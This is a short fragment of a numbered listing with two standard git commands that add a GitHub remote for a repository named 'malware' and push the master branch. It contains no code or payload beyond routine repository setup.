5 | git remote add origin https://github.com/Viper4K/malware.git
6 | git push -u origin master
7 |
--------------------------------------------------------------------------------